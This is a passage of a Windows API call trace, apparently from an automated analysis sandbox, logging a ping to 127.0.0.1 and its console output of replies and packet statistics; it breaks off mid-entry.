LocalFree (hMem=0x10b7b08) returned 0x0 [0112.391] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xfef3b0, nSize=0x0, Arguments=0xfef3ac | out: lpBuffer="笈ċﶀþ⛿\x94䰨盪✼") returned 0x9 [0112.391] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0112.391] _fileno (_File=0x76ea4c28) returned 1 [0112.391] _get_osfhandle (_FileHandle=1) returned 0x28 [0112.391] GetFileType (hFile=0x28) returned 0x2 [0112.391] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef374 | out: lpMode=0xfef374) returned 0 [0112.391] GetLastError () returned 0x6 [0112.391] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef2d8, nSize=0x50 | out: lpBuffer="þ✼") returned 0x0 [0112.391] _fileno (_File=0x76ea4c28) returned 1 [0112.391] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0112.391] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0112.391] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10a8a78 [0112.391] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x10a8a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0112.391] _fileno (_File=0x76ea4c28) returned 1 [0112.391] _write (in: _FileHandle=1, _Buf=0x10a8a78*, _MaxCharCount=0x9 | out: _Buf=0x10a8a78*) returned 9 [0112.392] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0112.392] _fileno (_File=0x76ea4c28) returned 1 [0112.392] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0112.392] LocalFree (hMem=0x10a8a78) returned 0x0 [0112.392] LocalFree (hMem=0x10b7b08) returned 0x0 [0112.392] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xfef3b4, nSize=0x0, Arguments=0xfef3b0 | out: lpBuffer="笈ċﶀþ➷\x94䰨盪✧") returned 0x9 [0112.392] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0112.392] _fileno (_File=0x76ea4c28) returned 1 [0112.392] _get_osfhandle (_FileHandle=1) returned 0x28 [0112.392] GetFileType (hFile=0x28) returned 0x2 [0112.392] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef378 | out: lpMode=0xfef378) returned 0 [0112.392] GetLastError () returned 0x6 [0112.392] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef2dc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0112.392] _fileno (_File=0x76ea4c28) returned 1 [0112.392] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0112.392] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0112.392] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10a89e8 [0112.392] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x10a89e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0112.392] _fileno (_File=0x76ea4c28) returned 1 [0112.392] _write (in: _FileHandle=1, _Buf=0x10a89e8*, _MaxCharCount=0x9 | out: _Buf=0x10a89e8*) returned 9 [0112.392] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0112.392] _fileno (_File=0x76ea4c28) returned 1 [0112.392] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0112.392] LocalFree (hMem=0x10a89e8) returned 0x0 [0112.392] LocalFree (hMem=0x10b7b08) returned 0x0 [0112.392] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xfef3b0, nSize=0x0, Arguments=0xfef3ac | out: lpBuffer="笈ċﶀþ⟘\x94䰨盪✨") returned 0x9 [0112.392] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0112.392] _fileno (_File=0x76ea4c28) returned 1 [0112.392] _get_osfhandle (_FileHandle=1) returned 0x28 [0112.392] GetFileType (hFile=0x28) returned 0x2 [0112.392] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef374 | out: lpMode=0xfef374) returned 0 [0112.392] GetLastError () returned 0x6 [0112.392] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef2d8, nSize=0x50 | out: lpBuffer="þ✨") returned 0x0 [0112.392] _fileno (_File=0x76ea4c28) returned 1 [0112.392] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0112.392] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0112.392] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10a89e8 [0112.392] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x10a89e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0112.392] _fileno (_File=0x76ea4c28) returned 1 [0112.392] _write (in: _FileHandle=1, _Buf=0x10a89e8*, _MaxCharCount=0x9 | out: _Buf=0x10a89e8*) returned 9 [0112.392] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0112.392] _fileno (_File=0x76ea4c28) returned 1 [0112.392] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0112.392] LocalFree (hMem=0x10a89e8) returned 0x0 [0112.392] LocalFree (hMem=0x10b7b08) returned 0x0 [0112.392] Sleep (dwMilliseconds=0x3e8) [0113.401] IcmpSendEcho2Ex (in: IcmpHandle=0x10a6c98, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x10ac188, RequestSize=0x20, RequestOptions=0xfef42c, ReplyBuffer=0x10b5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x10b5270) returned 0x1 [0113.402] InetNtopW (in: Family=2, pAddr=0xfef41c, pStringBuf=0xfef544, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0113.402] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xfef3b0, nSize=0x0, Arguments=0xfef3ac | out: lpBuffer="羠ċﶀþ⛔\x94䰨盪✣") returned 0x16 [0113.402] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0113.402] _fileno (_File=0x76ea4c28) returned 1 [0113.402] _get_osfhandle (_FileHandle=1) returned 0x28 [0113.402] GetFileType (hFile=0x28) returned 0x2 [0113.402] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef374 | out: lpMode=0xfef374) returned 0 [0113.402] GetLastError () returned 0x6 [0113.402] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef2d8, nSize=0x50 | out: lpBuffer="þ✣") returned 0x0 [0113.402] _fileno (_File=0x76ea4c28) returned 1 [0113.402] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0113.402] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0113.402] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x10b7fd8 [0113.403] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x10b7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0113.403] _fileno (_File=0x76ea4c28) returned 1 [0113.403] _write (in: _FileHandle=1, _Buf=0x10b7fd8*, _MaxCharCount=0x16 | out: _Buf=0x10b7fd8*) returned 22 [0113.403] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0113.403] _fileno (_File=0x76ea4c28) returned 1 [0113.403] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0113.403] LocalFree (hMem=0x10b7fd8) returned 0x0 [0113.403] LocalFree (hMem=0x10b7fa0) returned 0x0 [0113.403] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xfef3b0, nSize=0x0, Arguments=0xfef3ac | out: lpBuffer="羠ċﶀþ⛿\x94䰨盪✼") returned 0x9 [0113.403] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0113.403] _fileno (_File=0x76ea4c28) returned 1 [0113.403] _get_osfhandle (_FileHandle=1) returned 0x28 [0113.403] GetFileType (hFile=0x28) returned 0x2 [0113.403] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef374 | out: lpMode=0xfef374) returned 0 [0113.403] GetLastError () returned 0x6 [0113.403] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef2d8, nSize=0x50 | out: lpBuffer="þ✼") returned 0x0 [0113.403] _fileno (_File=0x76ea4c28) returned 1 [0113.403] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0113.403] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.403] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10a8a48 [0113.403] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x10a8a48, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0113.403] _fileno (_File=0x76ea4c28) returned 1 [0113.403] _write (in: _FileHandle=1, _Buf=0x10a8a48*, _MaxCharCount=0x9 | out: _Buf=0x10a8a48*) returned 9 [0113.403] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0113.403] _fileno (_File=0x76ea4c28) returned 1 [0113.403] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0113.403] LocalFree (hMem=0x10a8a48) returned 0x0 [0113.403] LocalFree (hMem=0x10b7fa0) returned 0x0 [0113.403] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xfef3b4, nSize=0x0, Arguments=0xfef3b0 | out: lpBuffer="羠ċﶀþ➷\x94䰨盪✧") returned 0x9 [0113.403] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0113.403] _fileno (_File=0x76ea4c28) returned 1 [0113.403] _get_osfhandle (_FileHandle=1) returned 0x28 [0113.403] GetFileType (hFile=0x28) returned 0x2 [0113.403] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef378 | out: lpMode=0xfef378) returned 0 [0113.403] GetLastError () returned 0x6 [0113.403] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef2dc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0113.403] _fileno (_File=0x76ea4c28) returned 1 [0113.403] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0113.403] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.403] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10a8a18 [0113.404] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x10a8a18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0113.404] _fileno (_File=0x76ea4c28) returned 1 [0113.404] _write (in: _FileHandle=1, _Buf=0x10a8a18*, _MaxCharCount=0x9 | out: _Buf=0x10a8a18*) returned 9 [0113.404] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0113.404] _fileno (_File=0x76ea4c28) returned 1 [0113.404] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0113.404] LocalFree (hMem=0x10a8a18) returned 0x0 [0113.404] LocalFree (hMem=0x10b7fa0) returned 0x0 [0113.404] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xfef3b0, nSize=0x0, Arguments=0xfef3ac | out: lpBuffer="羠ċﶀþ⟘\x94䰨盪✨") returned 0x9 [0113.404] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0113.404] _fileno (_File=0x76ea4c28) returned 1 [0113.404] _get_osfhandle (_FileHandle=1) returned 0x28 [0113.404] GetFileType (hFile=0x28) returned 0x2 [0113.404] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef374 | out: lpMode=0xfef374) returned 0 [0113.404] GetLastError () returned 0x6 [0113.404] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef2d8, nSize=0x50 | out: lpBuffer="þ✨") returned 0x0 [0113.404] _fileno (_File=0x76ea4c28) returned 1 [0113.404] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0113.404] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.404] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10a89e8 [0113.404] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x10a89e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0113.404] _fileno (_File=0x76ea4c28) returned 1 [0113.404] _write (in: _FileHandle=1, _Buf=0x10a89e8*, _MaxCharCount=0x9 | out: _Buf=0x10a89e8*) returned 9 [0113.404] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0113.404] _fileno (_File=0x76ea4c28) returned 1 [0113.404] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0113.404] LocalFree (hMem=0x10a89e8) returned 0x0 [0113.404] LocalFree (hMem=0x10b7fa0) returned 0x0 [0113.404] Sleep (dwMilliseconds=0x3e8) [0114.417] IcmpSendEcho2Ex (in: IcmpHandle=0x10a6c98, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x10ac188, RequestSize=0x20, RequestOptions=0xfef42c, ReplyBuffer=0x10b5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x10b5270) returned 0x1 [0114.418] InetNtopW (in: Family=2, pAddr=0xfef41c, pStringBuf=0xfef544, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0114.418] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xfef3b0, nSize=0x0, Arguments=0xfef3ac | out: lpBuffer="羠ċﶀþ⛔\x94䰨盪✣") returned 0x16 [0114.418] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.418] _fileno (_File=0x76ea4c28) returned 1 [0114.418] _get_osfhandle (_FileHandle=1) returned 0x28 [0114.418] GetFileType (hFile=0x28) returned 0x2 [0114.418] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef374 | out: lpMode=0xfef374) returned 0 [0114.418] GetLastError () returned 0x6 [0114.418] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef2d8, nSize=0x50 | out: lpBuffer="þ✣") returned 0x0 [0114.418] _fileno (_File=0x76ea4c28) returned 1 [0114.418] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0114.418] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0114.418] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x10b7fd8 [0114.418] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x10b7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0114.418] _fileno (_File=0x76ea4c28) returned 1 [0114.418] _write (in: _FileHandle=1, _Buf=0x10b7fd8*, _MaxCharCount=0x16 | out: _Buf=0x10b7fd8*) returned 22 [0114.418] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.418] _fileno (_File=0x76ea4c28) returned 1 [0114.418] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0114.418] LocalFree (hMem=0x10b7fd8) returned 0x0 [0114.418] LocalFree (hMem=0x10b7fa0) returned 0x0 [0114.418] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xfef3b0, nSize=0x0, Arguments=0xfef3ac | out: lpBuffer="羠ċﶀþ⛿\x94䰨盪✼") returned 0x9 [0114.418] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.418] _fileno (_File=0x76ea4c28) returned 1 [0114.418] _get_osfhandle (_FileHandle=1) returned 0x28 [0114.418] GetFileType (hFile=0x28) returned 0x2 [0114.418] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef374 | out: lpMode=0xfef374) returned 0 [0114.418] GetLastError () returned 0x6 [0114.418] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef2d8, nSize=0x50 | out: lpBuffer="þ✼") returned 0x0 [0114.418] _fileno (_File=0x76ea4c28) returned 1 [0114.418] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0114.418] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.418] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10a89e8 [0114.418] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x10a89e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0114.418] _fileno (_File=0x76ea4c28) returned 1 [0114.418] _write (in: _FileHandle=1, _Buf=0x10a89e8*, _MaxCharCount=0x9 | out: _Buf=0x10a89e8*) returned 9 [0114.418] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.419] _fileno (_File=0x76ea4c28) returned 1 [0114.419] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0114.419] LocalFree (hMem=0x10a89e8) returned 0x0 [0114.419] LocalFree (hMem=0x10b7fa0) returned 0x0 [0114.419] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xfef3b4, nSize=0x0, Arguments=0xfef3b0 | out: lpBuffer="羠ċﶀþ➷\x94䰨盪✧") returned 0x9 [0114.419] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.419] _fileno (_File=0x76ea4c28) returned 1 [0114.419] _get_osfhandle (_FileHandle=1) returned 0x28 [0114.419] GetFileType (hFile=0x28) returned 0x2 [0114.419] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef378 | out: lpMode=0xfef378) returned 0 [0114.419] GetLastError () returned 0x6 [0114.419] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef2dc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0114.419] _fileno (_File=0x76ea4c28) returned 1 [0114.419] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0114.419] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.419] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10a89e8 [0114.419] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x10a89e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0114.419] _fileno (_File=0x76ea4c28) returned 1 [0114.419] _write (in: _FileHandle=1, _Buf=0x10a89e8*, _MaxCharCount=0x9 | out: _Buf=0x10a89e8*) returned 9 [0114.419] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.419] _fileno (_File=0x76ea4c28) returned 1 [0114.419] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0114.419] LocalFree (hMem=0x10a89e8) returned 0x0 [0114.419] LocalFree (hMem=0x10b7fa0) returned 0x0 [0114.419] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xfef3b0, nSize=0x0, Arguments=0xfef3ac | out: lpBuffer="羠ċﶀþ⟘\x94䰨盪✨") returned 0x9 [0114.419] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.419] _fileno (_File=0x76ea4c28) returned 1 [0114.419] _get_osfhandle (_FileHandle=1) returned 0x28 [0114.419] GetFileType (hFile=0x28) returned 0x2 [0114.419] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef374 | out: lpMode=0xfef374) returned 0 [0114.419] GetLastError () returned 0x6 [0114.419] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef2d8, nSize=0x50 | out: lpBuffer="þ✨") returned 0x0 [0114.419] _fileno (_File=0x76ea4c28) returned 1 [0114.419] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0114.419] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.419] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10a89e8 [0114.419] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x10a89e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0114.419] _fileno (_File=0x76ea4c28) returned 1 [0114.419] _write (in: _FileHandle=1, _Buf=0x10a89e8*, _MaxCharCount=0x9 | out: _Buf=0x10a89e8*) returned 9 [0114.419] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.419] _fileno (_File=0x76ea4c28) returned 1 [0114.419] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0114.419] LocalFree (hMem=0x10a89e8) returned 0x0 [0114.419] LocalFree (hMem=0x10b7fa0) returned 0x0 [0114.419] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xfef338, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0114.419] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xfef30c, nSize=0x0, Arguments=0xfef308 | out: lpBuffer="羠ċþ᧰\x94䰨盪❏") returned 0x5c [0114.419] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.419] _fileno (_File=0x76ea4c28) returned 1 [0114.419] _get_osfhandle (_FileHandle=1) returned 0x28 [0114.420] GetFileType (hFile=0x28) returned 0x2 [0114.420] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef2d0 | out: lpMode=0xfef2d0) returned 0 [0114.420] GetLastError () returned 0x6 [0114.420] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef234, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0114.420] _fileno (_File=0x76ea4c28) returned 1 [0114.420] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0114.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0114.420] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0x10b8068 [0114.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x10b8068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0114.420] _fileno (_File=0x76ea4c28) returned 1 [0114.420] _write (in: _FileHandle=1, _Buf=0x10b8068*, _MaxCharCount=0x5c | out: _Buf=0x10b8068*) returned 92 [0114.420] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.420] _fileno (_File=0x76ea4c28) returned 1 [0114.420] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0114.420] LocalFree (hMem=0x10b8068) returned 0x0 [0114.420] LocalFree (hMem=0x10b7fa0) returned 0x0 [0114.420] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xfef318, nSize=0x0, Arguments=0xfef314 | out: lpBuffer="羠ċþᨧ\x94䰨盪❓") returned 0x61 [0114.420] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.420] _fileno (_File=0x76ea4c28) returned 1 [0114.420] _get_osfhandle (_FileHandle=1) returned 0x28 [0114.420] GetFileType (hFile=0x28) returned 0x2 [0114.420] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef2dc | out: lpMode=0xfef2dc) returned 0 [0114.420] GetLastError () returned 0x6 [0114.420] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef240, nSize=0x50 | out: lpBuffer="þ❓") returned 0x0 [0114.420] _fileno (_File=0x76ea4c28) returned 1 [0114.420] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0114.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 